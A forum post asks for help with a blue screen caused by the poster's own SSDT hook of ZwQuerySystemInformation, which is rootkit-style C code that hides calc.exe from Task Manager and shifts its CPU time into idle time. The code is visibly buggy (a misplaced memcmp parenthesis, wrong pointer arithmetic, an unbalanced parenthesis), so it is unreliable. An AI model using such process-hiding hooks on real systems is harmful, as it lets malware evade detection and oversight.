Got a blue screen when ZwQuerySystemInformation is hooked (SSDT hooking)

Hi guys

I've written a program, as described in Rootkit: Subverting ......, to hide a process such as calc.exe, but whenever I open Task Manager to check whether the process has been hidden, I get a blue screen....

(I'm not going to include the pieces of code that disable WP and so on ;) )

Here is my source :)


/* Per-thread record as laid out in this post; it is only used here as the
   trailing array element of struct _SYSTEM_PROCESSES. Field semantics are not
   verified anywhere in this listing. */
struct _SYSTEM_THREADS   
{   
        LARGE_INTEGER           KernelTime;   
        LARGE_INTEGER           UserTime;   
        LARGE_INTEGER           CreateTime;   
        ULONG                           WaitTime;   
        PVOID                           StartAddress;   
        CLIENT_ID                       ClientIs;   /* presumably ClientId; name as given in the post */
        KPRIORITY                       Priority;   
        KPRIORITY                       BasePriority;   
        ULONG                           ContextSwitchCount;   
        ULONG                           ThreadState;   
        KWAIT_REASON            WaitReason;   
};   
   
/* Per-process record as laid out in this post. The hook below reads
   NextEntryDelta (byte offset to the next record, 0 on the last one),
   ProcessName, UserTime and KernelTime; nothing else in this listing
   depends on the remaining fields. */
struct _SYSTEM_PROCESSES   
{   
        ULONG                           NextEntryDelta;   
        ULONG                           ThreadCount;   
        ULONG                           Reserved[6];   
        LARGE_INTEGER           CreateTime;   
        LARGE_INTEGER           UserTime;   
        LARGE_INTEGER           KernelTime;   
        UNICODE_STRING          ProcessName;   
        KPRIORITY                       BasePriority;   
        ULONG                           ProcessId;   
        ULONG                           InheritedFromProcessId;   
        ULONG                           HandleCount;   
        ULONG                           Reserved2[2];   
        VM_COUNTERS                     VmCounters;   
        IO_COUNTERS                     IoCounters; //windows 2000 only   
        struct _SYSTEM_THREADS          Threads[1];   /* variable-length tail, ThreadCount entries */
};   
   
/* Processor time counters as laid out in this post; only IdleTime is
   touched by the hook below. */
struct _SYSTEM_PROCESSOR_TIMES   
{   
        LARGE_INTEGER                   IdleTime;   
        LARGE_INTEGER                   KernelTime;   
        LARGE_INTEGER                   UserTime;   
        LARGE_INTEGER                   DpcTime;   
        LARGE_INTEGER                   InterruptTime;   
        ULONG                           InterruptCount;   
};   
   
/* Prototype of the kernel export this post hooks; the typedef below mirrors
   it so the saved original entry can be called through a pointer. */
extern "C" NTSYSAPI
NTSTATUS
NTAPI ZwQuerySystemInformation(
  IN	   ULONG SystemInformationClass,
  IN	   PVOID SystemInformation,
  IN       ULONG SystemInformationLength,
  OUT      PULONG ReturnLength
);

typedef NTSTATUS (*ZwQuerySystemInformationPtr)(
  IN	   ULONG SystemInformationClass,
  IN	   PVOID SystemInformation,
  IN       ULONG SystemInformationLength,
  OUT      PULONG ReturnLength
);

/* Original entry saved before the table was patched (set by code the post
   omits); must be non-NULL before the hook is ever reached. */
ZwQuerySystemInformationPtr		ZwQuerySystemInformationOld;
/* File-scope accumulators, read and written by the hook below; they are
   shared across concurrent callers with no synchronization in this listing. */
LARGE_INTEGER                   m_UserTime;   
LARGE_INTEGER                   m_KernelTime;   

NTSTATUS NewZwQuerySystemInformation(IN ULONG SystemInformationClass,IN PVOID SystemInformation,IN ULONG SystemInformationLength,OUT PULONG ReturnLength)
{
	NTSTATUS ntStatus;
	ntStatus = ((ZwQuerySystemInformationPtr)(ZwQuerySystemInformationOld))(SystemInformationClass,SystemInformation,SystemInformationLength,ReturnLength);

	if(NT_SUCCESS(ntStatus))
	{
		//File and Directory Listing
		if(SystemInformationClass==5)
		{
			struct _SYSTEM_PROCESSES *cPRS = (struct _SYSTEM_PROCESSES *)SystemInformation;
			struct _SYSTEM_PROCESSES *pPRS = NULL;
			while (cPRS)
			{
				if(cPRS->ProcessName.Buffer != NULL)
				{
					if(memcmp(cPRS->ProcessName.Buffer,L"calc.exe",12 == 0))
					{
						m_UserTime.QuadPart   += cPRS->UserTime.QuadPart;
						m_KernelTime.QuadPart += cPRS->KernelTime.QuadPart;
						if(pPRS)
						{
							if(cPRS->NextEntryDelta)
							{
								pPRS->NextEntryDelta += cPRS->NextEntryDelta;
							} 
							else
							{
								pPRS->NextEntryDelta = 0;
							}
						}
						else
						{
							if(cPRS->NextEntryDelta)
							{
								SystemInformation = (char *)SystemInformation + cPRS->NextEntryDelta);
							}
							else
								SystemInformation = NULL;
						}
					}
				}
				else
				{
					cPRS->UserTime.QuadPart   += m_UserTime.QuadPart;
					cPRS->KernelTime.QuadPart += m_KernelTime.QuadPart;
					m_UserTime.QuadPart		   = m_KernelTime.QuadPart = 0;
				}
				pPRS = cPRS;
				if(cPRS->NextEntryDelta)(cPRS += cPRS->NextEntryDelta);
				else cPRS = NULL;
			}
		}

		else if(SystemInformationClass == 8)
		{
			struct _SYSTEM_PROCESSOR_TIMES *times = (struct _SYSTEM_PROCESSOR_TIMES *)SystemInformation;
			times->IdleTime.QuadPart += m_UserTime.QuadPart + m_KernelTime.QuadPart;
		}
	}
	return ntStatus;
}




I have no idea how to solve it... I'm using WinDDK 7.1 and VS2010.

Thanks in advance